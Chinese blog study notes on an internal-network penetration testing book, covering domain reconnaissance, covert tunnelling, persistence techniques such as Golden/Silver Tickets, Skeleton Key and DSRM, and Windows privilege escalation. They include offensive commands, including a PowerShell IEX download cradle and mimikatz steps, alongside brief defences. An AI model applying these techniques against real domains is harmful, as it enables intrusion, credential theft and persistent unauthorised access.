<p>下载地址：<a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psloggedon" target="_blank" rel="noopener">https://docs.microsoft.com/zh-cn/sysinternals/downloads/psloggedon</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">psloggedon.exe \\dc2012</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQwR0.png" alt="avatar"></p>
<p><strong>PVEFindADUser</strong></p>
<p>PVEFindADUser能够用于查找活动目录用户登录的位置，枚举与用户，以及查找在特定计算机上登录的用户。包括本地用户、通过RDP登录的用户、用于运行服务和计划任务的用户。（这个工具需要.NET 3.5）</p>
<p>Windows Server 2012安装.NET 3.5可能不成功，需要指定安装源：<a href="https://www.cr173.com/soft/921507.html" target="_blank" rel="noopener">https://www.cr173.com/soft/921507.html</a></p>
<p><img src="https://s4.ax1x.com/2022/02/04/HeQtaj.png" alt="avatar"></p>
<p>下载地址：<a href="https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn">https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PVEFindADUser.exe -current</span><br></pre></td></tr></table></figure>

<p><img src="https://s4.ax1x.com/2022/02/04/HeQYZQ.png" alt="avatar"></p>
<p><strong>NetView</strong></p>
<p>NetView是一个枚举工具，使用WinAPI枚举系统，利用NetSessionEnum找寻登陆会话，利用NetShareEnum找寻共享，利用NetWkstaUserEnum枚举登录的用户。同时还能够查询共享入口和有价值的用户。</p>
<p>下载地址：<a href="https://github.com/mubix/netview">https://github.com/mubix/netview</a></p>
<p><strong>Netness</strong></p>
<p>下载地址没找到</p>
<p><strong>PowerView</strong></p>
<p>使用Powerview的Invoke-UserHunter。</p>
<p><strong>Empire</strong></p>
<p>Empire中也存在此类型的脚本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">usemodule situational_awareness/network/powerview/user_hunter</span><br><span class="line">execute</span><br></pre></td></tr></table></figure>

<p><strong>Nmap的NSE脚本</strong></p>
<p>通过Nmap的NSE脚本获取远程机器的登陆会话。</p>
<p>smb-enum-sessions.nse获取域内主机的用户登录会话，查看当前是否有用户登录。下载地址：<a href="https://nmap.org/nsedoc/scripts/smb-enum-sessions.html" target="_blank" rel="noopener">https://nmap.org/nsedoc/scripts/smb-enum-sessions.html</a></p>
<p>smb-enum-domains.nse对域控制器进行信息收集，可以获取主机信息用户、可使用密码策略的用户等。</p>
<p>smb-enum-users.nse可以使用此脚本对域控进行扫描。</p>
<h3 id="8-查找域管理进程"><a href="#8-查找域管理进程" class="headerlink" title="8. 查找域管理进程"></a>8. 查找域管理进程</h3><p>其中阿里云上有个链接也说到了类似的方法：<a href="https://yq.aliyun.com/articles/599377?type=2" target="_blank" rel="noopener">https://yq.aliyun.com/articles/599377?type=2</a></p>
<p>本机检查：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//获取域管理员列表</span><br><span class="line">net group &quot;Domain Admins&quot; /domain</span><br><span class="line"></span><br><span class="line">//列出本机的所有进程和进程用户</span><br><span class="line">tasklist /v</span><br></pre></td></tr></table></figure>

<p>查询域控的域用户会话</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//查询域控列表</span><br><span class="line">net group &quot;Domain Controllers&quot; /domain</span><br><span class="line"></span><br><span class="line">//收集所有活动域的会话列表</span><br><span class="line">netsess -h</span><br></pre></td></tr></table></figure>

<h2 id="三、自动化信息收集"><a href="#三、自动化信息收集" class="headerlink" title="三、自动化信息收集:"></a>三、自动化信息收集:</h2><p><a href="https://github.com/gysf666/wmic_info">https://github.com/gysf666/wmic_info</a></p>
<hr>
</font>

<font size=4 >

<!-- more -->



<h1 id="2-隐藏通信隧道技术"><a href="#2-隐藏通信隧道技术" class="headerlink" title="2.隐藏通信隧道技术"></a>2.隐藏通信隧道技术</h1><p>《内网安全攻防：渗透测试实战指南》第3章：隐藏通信隧道技术</p>
<p>网络隐藏通信隧道是与目标主机进行信息传输的主要工具。在大量TCP、UDP通信被防御系统拦截的情况下，DNS、ICMP等难以禁用的协议已经被攻击者利用，成为攻击者控制隧道的主要通道。</p>
<p>本章详细介绍了IPv6隧道、ICMP隧道、HTTPS隧道、SSH隧道、DNS隧道等加密隧道的使用方法，并对常见的SOCKS代理工具及内网上传&#x2F;下载方法进行了解说。</p>
<p>详细介绍:<br><a href="">内网渗透之代理转发</a></p>
<h2 id="1-判断内网的连通性"><a href="#1-判断内网的连通性" class="headerlink" title="1.判断内网的连通性"></a>1.判断内网的连通性</h2><p>隐藏通信隧道技术常用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的数据传输。</p>
<p>在实际的网络中，通常会通过各种边界设备、软&#x2F;硬件防火墙甚至入侵检测系统来<strong>检查主机对外的网络连接情况</strong>，如果发现异常，就会对通信进行阻断。</p>
<p>隧道，就是一种绕过端口屏蔽的通信方式。<strong>防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装，然后穿过防火墙，与对方进行通信。当被封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应的服务器上。</strong></p>
<p><strong>一般分两种情况:</strong><br><strong>1.无流量</strong><br><strong>2.流量不直接出网，需要在内网中设置代理服务器,常见于通过企业办公网段上网的场景</strong><br>判断方法:<br>1.查看网络连接，判断是否存在于其他机器的8080(不绝对)等端口的链接(可以尝试运行 “ping -n 1 -a ip” 命令)<br>2.查看内网是否有主机名类似于 “proxy” 的机器<br>3.查看IE浏览器的直接代理.<br>4.根据pac文件的路径(可能是本地路径，也可能是远程路径)，将其下载下来并查看.<br>5.执行如下命令，利用curl工具进行确认.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl www.baidu.com                      //不通</span><br><span class="line">curl -x proxy-ip:port www.baidu.com     //通</span><br></pre></td></tr></table></figure>

<p><strong>常用工具举例. ICMP（ping ip）、TCP&#x2F;UDP（nc ip port）、HTTP（curl <a href="http://www.baidu.com)、/" target="_blank" rel="noopener">www.baidu.com）、</a></strong></p>
<p><strong>DNS（nslookup baidu.com VPSip、dig baidu.com @VPSip）</strong><br>nc使用:<br><a href="https://www.cnblogs.com/LyShark/p/12302379.html" target="_blank" rel="noopener">https://www.cnblogs.com/LyShark/p/12302379.html</a></p>
<p>powercat:<br><a href="https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/KH-Y_8Df2COINksR6cbB2w</a></p>
<h2 id="2-网络层隧道技术（IPv6、ICMP）"><a href="#2-网络层隧道技术（IPv6、ICMP）" class="headerlink" title="2.网络层隧道技术（IPv6、ICMP）"></a>2.网络层隧道技术（IPv6、ICMP）</h2><p>IPv6隧道：可以将IPv4作为隧道载体，将IPv6报文整体封装在IPv4数据报文中。</p>
<p><strong>常用工具举例. socat、6tunnel、nt6tunnel等</strong></p>
<p>ICMP隧道：在一般的通信协议中，如果两台设备要进行通信，肯定需要开放端口，而在ICMP协议下就不需要。</p>
<p><strong>常用工具举例. icmpsh、PingTunnel、icmptunnel、powershell icmp等</strong></p>
<p>防御：检测数量、报文大小、特征标识等。一个正常的ping每秒最多发送两个数据包，而使用ICMP隧道数量会激增。</p>
<h2 id="3-传输层隧道技术（TCP、UDP）"><a href="#3-传输层隧道技术（TCP、UDP）" class="headerlink" title="3.传输层隧道技术（TCP、UDP）"></a>3.传输层隧道技术（TCP、UDP）</h2><p><strong>常用工具举例. lcx、netcat（nc -c参数）、PowerCat</strong></p>
<p>各种语言的反弹shell。</p>
<h2 id="4-应用层隧道技术（SSH、HTTP-s、DNS）"><a href="#4-应用层隧道技术（SSH、HTTP-s、DNS）" class="headerlink" title="4.应用层隧道技术（SSH、HTTP&#x2F;s、DNS）"></a>4.应用层隧道技术（SSH、HTTP&#x2F;s、DNS）</h2><p><strong>SSH：-CfNg，-L本地端口转发，-R远程端口转发，-D动态转发（SOCKS代理）</strong></p>
<p>防御：白名单、ACL限制请求IP。</p>
<p><strong>HTTP&#x2F;s：reGeorg、meterpreter、tunna等</strong></p>
<p><a href="https://zhuanlan.zhihu.com/p/30571456" target="_blank" rel="noopener">简单使用vim</a><br><a href="https://www.freebuf.com/articles/system/248246.html" target="_blank" rel="noopener">reGeorg+Proxifier代理内网渗透工具</a><br><a href="https://www.cnblogs.com/FSHOU/p/12523912.html" target="_blank" rel="noopener">内网渗透_reGeorg+proxychains</a></p>
<p>DNS：DNS是一个必不可少的服务，DNS报文本身具有穿透防火墙的能力。</p>
<p>从DNS协议的角度看，只是在一次次的查询某个特定的域名并得到解析结果，但其本质问题是，预期的返回结果应该是一个IP地址，而事实返回的是任意字符串，包括加密的C2指令。</p>
<p><strong>DNS隧道本质是将其他协议封装在DNS协议中进行传输。</strong></p>
<p><em>工具：dnscat2</em></p>
<h2 id="5-SOCKS代理"><a href="#5-SOCKS代理" class="headerlink" title="5.SOCKS代理"></a>5.SOCKS代理</h2><p>SOCKS是”SOCKetS”的缩写。</p>
<p>SOCKS4只支持TCP协议；SOCKS5不仅支持TCP&#x2F;UDP协议，还支持各种身份验证机制。</p>
<p>SOCKS代理更底层，是在会话层；而HTTP代理是在应用层。因此SOCKS代理可以代理一切客户端的连接，而HTTP代理只能代理使用HTTP协议的客户端。由于更底层，不需要处理高级协议的细节，所以socks代理更快。</p>
<p>SOCKET被称作”套接字”，用于描述IP地址和端口，是一个通信链的句柄，可以用来实现不同计算机之间的通信，它的本质是编程接口(API)，是对TCP&#x2F;IP的封装。SOCKS是一个代理协议，目前最新版本为SOCKS5，所谓代理就是，你可以通过它的去间接的访问网络，相当于一个中转站。区别：SOCKET是一个API，一个工具，让你建立网络连接用的。SOCKS是协议，是一组数据结构。</p>
<p>目前VPN隧道协议主要有4种：点到点隧道协议PPTP、第二层隧道协议L2TP、网络层隧道协议IPSec以及SOCKS v5协议。其中，PPTP和L2TP工作在数据链路层，IPSec工作在网络层，SOCKS v5工作在会话层。</p>
<p><strong>常用工具举例. EarthWorm（ew、新版本Termite）、reGeorg、sSocks、SocksCap64（SSTap）、Proxifier、ProxyChains</strong></p>
<h2 id="6-压缩数据"><a href="#6-压缩数据" class="headerlink" title="6.压缩数据"></a>6.压缩数据</h2><p><strong>常用工具举例. rar.exe、7z.exe</strong></p>
<h2 id="7-上传和下载"><a href="#7-上传和下载" class="headerlink" title="7.上传和下载"></a>7.上传和下载</h2><p><strong>常用工具举例. ftp、vbs、bitsadmin、powershell等等</strong></p>
<p>Powershell的最大优势在于以.NET框架为基础，.NET框架在脚本领域几乎是无所不能的，因此ps1脚本文件的执行默认是被禁止的。</p>
<hr>
</font>

<font size=4 >

<!-- more -->

<p><strong>概括文章:</strong><br><a href="https://www.freebuf.com/articles/system/307269.html" target="_blank" rel="noopener">权限维持专题：操作系统权限维持(上篇)</a><br><a href="https://www.freebuf.com/articles/web/307773.html" target="_blank" rel="noopener">权限维持专题：域控制器权限维持(下篇)</a></p>
<h1 id="3-权限维持分析及防御"><a href="#3-权限维持分析及防御" class="headerlink" title="3.权限维持分析及防御:"></a>3.权限维持分析及防御:</h1><p>《内网安全攻防：渗透测试实战指南》第8章：权限维持分析及防御</p>
<p>本章分析了常见的针对操作系统后门、Web后门及域后门（白银票据、黄金票据等）的攻击手段，并给出了相应的检测和防范方法。</p>
<p>攻击者在提升权限之后，往往会通过建立后门来维持对目标主机的控制权。这样一来，即使目标修复了漏洞，攻击者还是可以通过后门继续控制目标系统。</p>
<h2 id="操作系统后门"><a href="#操作系统后门" class="headerlink" title="操作系统后门"></a>操作系统后门</h2><p>操作系统后门，泛指绕过目标系统安全控制体系的正规用户认证过程来维持对目标系统的控制权及隐匿控制行为的方法。</p>
<p><strong>详细操作:</strong><br><strong>e.g. <a href="https://www.baidu.com/link?url=cibM8A71ytw5Nmt8AEPuuRSqOwenn6yCBrvi0cEtpzD5rkymhiPb9VhCBOWTzPtlYQ319Si3_Q3Gr2dcGBAa4O9sl5Z487xMCzu3GR5XcuG&wd=&eqid=b6118875000073ef0000000662354ae4" target="_blank" rel="noopener">粘滞键后门</a>、<a href="https://www.freebuf.com/articles/web/251179.html" target="_blank" rel="noopener">注册表注入后门</a>、<a href="https://zhuanlan.zhihu.com/p/254839188?utm_source=qq" target="_blank" rel="noopener">计划任务后门</a>、<a href="https://www.cnblogs.com/jjj-fly/p/8178420.html" target="_blank" rel="noopener">meterpreter后门</a>、<a href="https://www.cnblogs.com/-qing-/p/10519363.html" target="_blank" rel="noopener">Cymothoa后门</a>、<a href="https://zhuanlan.zhihu.com/p/255065815?ivk_sa=1024320u" target="_blank" rel="noopener">WMI型后门</a></strong></p>
<p>粘滞键，5次shift，其实就是命令替换，解决无法同时按多个按键的问题，如将粘滞键设置为ctrl+p，因此可以调用cmd、执行后门程序、反弹脚本等。</p>
<p>在普通用户权限下可以将后门程序或脚本路径填写到启动项注册表中，当系统管理员登录系统时触发后门。</p>
<p>计划任务在Windows7及之前使用at，在Windows8开始使用schtasks。计划任务后门分为管理员权限和普通用户权限两种。可利用Metasploit、PowerSploit、Empire。</p>
<p>meterpreter后门，metsvc（依靠服务）和persistence（依靠启动项），<a href="https://getshell.icu/2018/Metasploit-%E6%8E%A7%E5%88%B6%E6%8C%81%E4%B9%85%E5%8C%96-%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" target="_blank" rel="noopener">参考</a>。</p>
<p>Cymothoa是一款可以将ShellCode注入现有内存（即插进程）的后门工具。</p>
<p>WMI型后门需要管理员权限。主要使用了WMI的两个特征，即无文件和无进程。原理：将代码加密存储于WMI中，达到所谓的“无文件”；当设定的条件被满足时，系统将自动启动PowerShell进程去执行后门程序，执行后，进程消失，达到所谓的“无进程”。</p>
<h2 id="Web后门"><a href="#Web后门" class="headerlink" title="Web后门"></a>Web后门</h2><p>WebShell</p>
<p>详细介绍:<br><a href="https://www.freebuf.com/articles/web/307773.html" target="_blank" rel="noopener">权限维持专题：域控制器权限维持(下篇)</a></p>
<h2 id="域控制器权限持久化"><a href="#域控制器权限持久化" class="headerlink" title="域控制器权限持久化"></a>域控制器权限持久化</h2><p>e.g. DSRM域后门、SSP维持域控权限、SID History域后门、<strong>Golden Ticket、Silver Ticket</strong>、Skeleton Key（万能密码）、Hook PasswordChangeNotify</p>
<p>在渗透测试过程中，如果发现系统中存在恶意行为，应及时更改域管理员密码，对受控机器进行断网处理，然后进行日志分析和取证。</p>
<h3 id="利用系统功能"><a href="#利用系统功能" class="headerlink" title="利用系统功能"></a>利用系统功能</h3><p><strong>DSRM</strong>（Directory Services Restore Mode，目录服务恢复模式）是Windows域环境中DC的安全模式启动选项。<strong>每个DC都有一个本地管理员账户（也就是DSRM账号）。</strong>DSRM的用途是：允许管理员在域环境中出现故障或崩溃时还原、修复、重建活动目录数据库，使域环境的运行恢复正常。在域环境创建时，DSRM的密码需要在安装DC时设置，且很少会被重置。因此可以使用ntdsutil工具同步krbtgt的NTLM Hash（即修改密码），再利用注册表修改DSRM的登录方式，即可使用PTH来实现权限持久化。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">(DC系统版本)</span><br><span class="line">windows server 2008:</span><br><span class="line">需要安装kb961320补丁才能使用</span><br><span class="line"></span><br><span class="line">windows server 2008以后版本的系统:</span><br><span class="line">无需安装补丁</span><br><span class="line"></span><br><span class="line">windows server 2003:</span><br><span class="line">不能使用该方法进行持久化操作</span><br></pre></td></tr></table></figure>


<p>防御：定期检查注册表中用于控制DSRM登录方式的键值是否为1、定期修改密码、WAF检查操作日志等。</p>
<p><strong>SSP</strong>（Security Support Provider）是Windows安全机制的提供者，就是一个DLL文件，主要用来实现Windows的身份认证功能，如NTLM、Kerberos等。如果获得了网络中目标机器的System权限，可以使用该方法进行持久化操作。</p>
<p>主要原理：LSA（Local Security Authority）用于身份验证；lsass.exe作为Windows的系统进程，用于本地安全和登陆策略；在系统启动时，SSP将被加载到lsass.exe进程中。但是，假如攻击者对LSA进行了扩展，自定义了恶意的DLL文件，在系统启动时将其加载到lsass.exe进程中，就能够获取lsass.exe进程中的明文密码，这样即使用户更改的密码并重新登陆，依然可以获取。</p>
<p>e.g. mimikatz misc::memssp和mimilib.dll</p>
<p>SID的作用主要是跟踪安全主体控制用户链接资源时的访问权限。SID History是在域迁移过程中的一个属性，如果迁移后用户的SID改变了，系统会将其原来的SID添加到迁移后用户的SID History属性中，使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。如果获取了域管理员权限，可以将SID History作为实现持久化的方法。如将Administrator的SID添加到恶意用户test的SID History属性中。</p>
<p>e.g. mimikatz sid::add</p>
<h3 id="PTT-伪造票据"><a href="#PTT-伪造票据" class="headerlink" title="PTT 伪造票据"></a>PTT 伪造票据</h3><p>Golden Ticket 黄金票据：</p>
<p>krbtgt（SID 502）是KDC服务使用的账号，属于Domain Admins组。在域环境中，每个用户账号的票据都是由krbtgt生成的，<strong>如果攻击者拿到了krbtgt的NTLM Hash或者AES-256值，就可以伪造域内任意用户的身份，并以该用户的身份访问其他服务。(核心诉求)</strong></p>
<p>PTT需要：目标域管理员用户名、完整的域名、域SID、krbtgt的NTLM Hash或AES-256值。</p>
<h4 id="大致步骤："><a href="#大致步骤：" class="headerlink" title="大致步骤："></a><strong>大致步骤：</strong></h4><ul>
<li>导出krbtgt的NTLM Hash（mimikatz lsadump::dcsync利用VSS远程转储AD的ntds.dit）、</li>
<li>获取基本信息（域SID wmic useraccount、当前用户SID whoami &#x2F;user、域管理员账号 net group、域名 ipconfig &#x2F;all）、</li>
<li>清空票据（mimikatz kerberos::purge）、</li>
<li>生成票据（kerberos::golden，利用NTLM Hash，AES-256同理）、</li>
<li>传递票据并注入内存（kerberos::ptt）、</li>
<li>检索当前会话中的票据（kerberos::tgt）、验证权限（dir \\dc\c$）</li>
</ul>
<p>防御：管理员通常会修改域管理员的密码，但有时会忘记将krbtgt密码一并修改。</p>
<p>使用Golden Ticket伪造的用户可以是任意用户（即使这个用户不存在）。因为TGT的加密是由krbtgt完成的，所以，只要TGT被krbtgt账户和密码正确的加密，那么任意KDC使用krbtgt将TGT解密后，TGT中的所有信息都是可信的。</p>
<p>Silver Ticket 白银票据：</p>
<p>Golden Ticket使用krbtgt账号的密码散列值，利用伪造高权限的TGT向KDC要求颁发拥有任意服务访问权限的票据，从而获取DC权限。而Silver Ticket会通过相应的服务账号来伪造TGS，例如LDAP、MSSQL、WinRM、DNS、CIFS等，范围有限，只能获取对应服务的权限。</p>
<p><strong>Golden Ticket是由krbtgt账号加密的，而Silver Ticket是由特定的服务账号加密的。</strong></p>
<p>PTT需要：域名、域SID、目标服务器的FQDN、可利用的服务、服务账号的NTLM Hash、需要伪造的用户名。</p>
<h3 id="其他方法"><a href="#其他方法" class="headerlink" title="其他方法"></a>其他方法</h3><p>Skeleton Key（万能密码），在DC中以域管理员权限使用mimikatz在lsass.exe进程注入Skeleton Key（misc::skeleton），就可以以域内任意用户的身份，配合该key（默认密码mimikatz）进行域内身份授权验证。</p>
<p>mimikatz首先使用privilege::debug提升权限到Debug权限，才能与lsass交互。2014年微软增加了LSA保护策略，防止lsass.exe进程被恶意注入。</p>
<p>防御：强口令、双因子认证、应用启动白名单等。</p>
<p>Hook PasswordChangeNotify，当用户修改密码后在系统中进行同步的同时抓取输入的明文密码。</p>
<p>在修改密码时，用户输入新密码后，LSA会调用PasswordFilter来检查该密码是否符合复杂性要求。如果密码符合复杂性要求，LSA会调用PasswordChangeNotify，在系统中同步密码。</p>
<hr>
</font>

<font size=4 >

<!-- more -->



<h1 id="4-权限提升及防御"><a href="#4-权限提升及防御" class="headerlink" title="4.权限提升及防御:"></a>4.权限提升及防御:</h1><p>《内网安全攻防：渗透测试实战指南》第4章：权限提升分析及防御</p>
<p>本章主要分析了系统的内核溢出漏洞提权、利用Windows操作系统错误配置提权、利用组策略首选项提权、绕过UAC提权、令牌窃取及无凭证条件下的权限获取，并提出了相应的安全防范措施。</p>
<p>在Windows中，权限大概分为四种：<strong>User</strong>（普通用户权限，默认不允许修改系统的设置或用户资料）、<strong>Administrator</strong>（管理员权限，可以利用Windows的机制将自己提升为System权限）、<strong>System</strong>（系统权限，可以对SAM等敏感文件进行读取）、TrustedInstaller（最高权限，不涉及，作用于系统文件）。</p>
<p><strong>常见的提权方法有系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、Web中间件漏洞提权、DLL劫持提权、滥用高权限令牌提权、第三方软件&#x2F;服务提权等。</strong></p>
<h2 id="内核溢出漏洞"><a href="#内核溢出漏洞" class="headerlink" title="内核溢出漏洞"></a>内核溢出漏洞</h2><p>使用<code>whoami /groups</code>查看当前权限。如果有Mandatory Label\Medium Mandatory Level，说明是一个标准用户，需要提权至Mandatory Label\High Mandatory Level管理员权限。</p>
<p><strong>发现缺失补丁</strong>：systeminfo、wmic qfe、Metasploit（post&#x2F;windows&#x2F;gather&#x2F;enum_patches、post&#x2F;multi&#x2F;recon&#x2F;local_exploit_suggester）、Windows-Exploit-Suggester、PowerShell（Sherlock）</p>
<p><a href="https://www.k0rz3n.com/2019/01/27/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%B0%8F%E6%8A%80%E5%B7%A7%E4%B8%80%EF%BC%9A%E5%AF%BB%E6%89%BEEXP/" target="_blank" rel="noopener">如何寻找EXP</a></p>
<h2 id="系统配置错误"><a href="#系统配置错误" class="headerlink" title="系统配置错误"></a>系统配置错误</h2><p>Windows操作系统中的<strong>常见配置错误包括管理员凭据配置错误、服务配置错误、故意削弱的安全措施、用户权限过高等。</strong></p>
<p><strong>1、系统服务权限配置错误</strong></p>
<p>Windows系统服务文件在操作系统启动时加载和执行，并在后台调用可执行文件。因此，如果一个低权限的用户对此类系统服务调用的可执行文件拥有<strong>写权限</strong>，就可以将该文件替换成任意可执行文件，并随着系统服务的启动获得系统权限。</p>
<p>服务正在运行且无法被终止：攻击者通常会利用<strong>DLL劫持</strong>技术并尝试重启服务来提权。</p>
<p>Metasploit的service_permissions模块使用两种方法来获得System权限：如果meterpreter以管理员权限运行，该模块会尝试创建并运行一个新的服务；如果当前权限不允许创建服务，该模块会判断哪些服务的文件或者文件夹的权限有问题，并允许对其进行劫持。</p>
<p><strong>PowerUp下的实战利用:</strong></p>
<p>(PowerShell下使用)</p>
<p><a href="https://blog.csdn.net/qq_44108455/article/details/107672896" target="_blank" rel="noopener">PowerSploit中的Powerup各种攻击模块</a></p>
<p><a href="https://www.cnblogs.com/micr067/p/11723492.html" target="_blank" rel="noopener">PowerUp攻击模块实战</a> </p>
<p>灰体部分为变量：(利用方法:将AbuseFunction的值填入变量并执行)<br>powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘C:\PowerUp.ps1’); <code>Invoke-AllChecks</code>“</p>
<p><strong>2、注册表键AlwaysInstallElevated</strong></p>
<p>Windows允许低权限用户以System权限运行安装文件，<strong>如果启用此策略设置项，那么任何权限的用户都能以System权限来安装MSI文件。</strong></p>
<p>Windows Installer是Windows操作系统的组件之一，专门用来管理和配置软件服务，其分为客户端安装服务（Msiexec.exe）和MSI文件两部分。Windows Installer通过Msiexec.exe安装MSI文件包含的程序，双击MSI文件就会运行Msiexec.exe。</p>
<p>如何利用:<br><a href="https://www.cnblogs.com/micr067/p/11723492.html" target="_blank" rel="noopener">PowerUp攻击模块实战(在下半部分)</a></p>
<p>Metasploit也可利用.</p>
<p><strong>3、可信任服务路径漏洞（Trusted Service Paths）</strong></p>
<p><strong>如果一个服务的可执行文件的路径没有被双引号引起来且包含空格（可信任服务路径），那么这个服务就是有漏洞的。</strong></p>
<p>因为Windows服务通常都是以System权限运行的，所以系统在解析服务所对应的文件路径中的空格时，也会以系统权限运行。前提还是有对应目标的写权限。<br>如：<code>C:\Program Files\Some Folder\Service.exe</code>寻找路径为<code>C:\Program.exe</code>、<code>C:\Program Files\Some.exe</code>、<code>C:\Program Files\Some Folder\Service.exe</code></p>
<p><strong>第一种做法:</strong><br>查看是否有服务存在该漏洞:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic service get name,displayname,pathname,startmode |findstr /i &quot;Auto&quot; |findstr /i /v &quot;C:\Windows\\&quot; |findstr /i /v &quot;&quot;&quot;</span><br></pre></td></tr></table></figure>

<p>如果有服务存在漏洞，则用windows内置工具icacls检查该目录的权限:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">icacls &quot;路径&quot;</span><br></pre></td></tr></table></figure>

<ul>
<li>Everyone:用户对这个文件夹有完全控制权限.也就是说,所有用户都具有修改这个文件夹的权限</li>
<li>(M):修改</li>
<li>(F):完全控制</li>
<li>(CI):从属容器将继承访问控制项</li>
<li>(OI):从属文件将继承访问控制项</li>
</ul>
<p>确认有漏洞后，把要上传的程序重命名并放置在存在此漏洞且可写的目录下，执行如下命令，尝试重启服务:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sc stop &quot;service_name&quot;</span><br><span class="line">sc start &quot;service_name&quot;</span><br></pre></td></tr></table></figure>

<p><strong>第2种做法:(推荐)</strong><br>Metasploit的trusted_service_path模块反弹的shell很快就会中断，这是因为当一个进程在系统中启动后，必须与服务控制管理器进行通信，如果没有进行通信，服务控制管理器会认为出现了错误，进而终止掉这个进程。因此，在终止前将它迁移到其他进程中（set AutoRunScript migrate -f 自动迁移）。</p>
<p><strong>4、自动安装配置文件</strong></p>
<p>域环境下批量部署可能会使用到配置文件，其中可能包含本地管理员的账号密码等信息，Metasploit的enum_unattend模块。</p>
<p>cmd下使用:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">dir /b /s c:\Unattend.xml</span><br></pre></td></tr></table></figure>

<p>或用Metasploit模块:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">post/windows/gather/enum_unattend</span><br></pre></td></tr></table></figure>

<p><strong>5、计划任务</strong></p>
<p>基于杀毒软件的检测等，攻击者会尽量避免接触目标机器的磁盘，而AccessChk是微软官方提供的工具，一般不会引起杀毒软件的报警，所以经常会被攻击者利用。<br><a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/accesschk" target="_blank" rel="noopener">AccessChk下载</a><br>列出某个驱动器下所有权限配置有缺陷的文件夹:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">accesschk.exe /accepteula</span><br><span class="line">accesschk.exe -uwdqsUsers c:\</span><br><span class="line">accesschk.exe -uwdqs &quot;AuthenticatedUsers&quot; c:\*.*</span><br></pre></td></tr></table></figure>

<p>列出某个驱动器下所有权限配置有缺陷的文件:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">accesschk.exe /accepteula</span><br><span class="line">accesschk.exe -uwqsUsers c:\</span><br><span class="line">accesschk.exe -uwqs &quot;AuthenticatedUsers&quot; c:\*.*</span><br></pre></td></tr></table></figure>

<p>Empire内置模块:<br>PowerUp（allchecks）</p>
<h2 id="组策略首选项提权漏洞"><a href="#组策略首选项提权漏洞" class="headerlink" title="组策略首选项提权漏洞"></a>组策略首选项提权漏洞</h2><p>SYSVOL是活动目录里面的一个用于存储域公共文件服务器副本的共享文件夹，是安装AD是自动创建的，主要用来存放登陆脚本、组策略数据及其他域控制器需要的域信息等。</p>
<p>为了方便地对所有的机器进行操作，网络管理员往往会使用组策略进行统一的配置和管理。通过组策略统一修改的密码，虽然强度有所提高，但所有机器的本地管理员密码是相同的。常见的组策略首选项（Group Policy Preferences，GPP）：创建本地用户、数据源（DataSources.xml）、创建&#x2F;更新服务（Services.xml）、计划任务（ScheduledTasks.xml）等。</p>
<p>管理员在域中新建一个组策略后，操作系统会自动在SYSVOL共享目录中生成一个XML文件，该文件保存了该组策略更新后的密码，但是使用AES256加密，但是2012年微软公布了私钥，XML文件中关键词cpassword。</p>
<p>2014年官方发布了补丁，不再将密码保存到组策略首选项中</p>
<p>详细介绍:<br><a href="https://blog.csdn.net/weixin_45007073/article/details/117364976" target="_blank" rel="noopener">组策略首选项提权分析</a></p>
<h2 id="绕过UAC提权"><a href="#绕过UAC提权" class="headerlink" title="绕过UAC提权"></a>绕过UAC提权</h2><p>Microsoft 自 Windows Vista 中引入了 UAC （User Account Control）机制并在 Windows 7 中对 UAC 机制进行了完善。<strong>UAC 与 UNIX 中的 sudo 的工作机制十分相似。</strong>平时用户以普通权限工作，当用户需要执行特权操作时，系统会询问他们是否要提升其权限。</p>
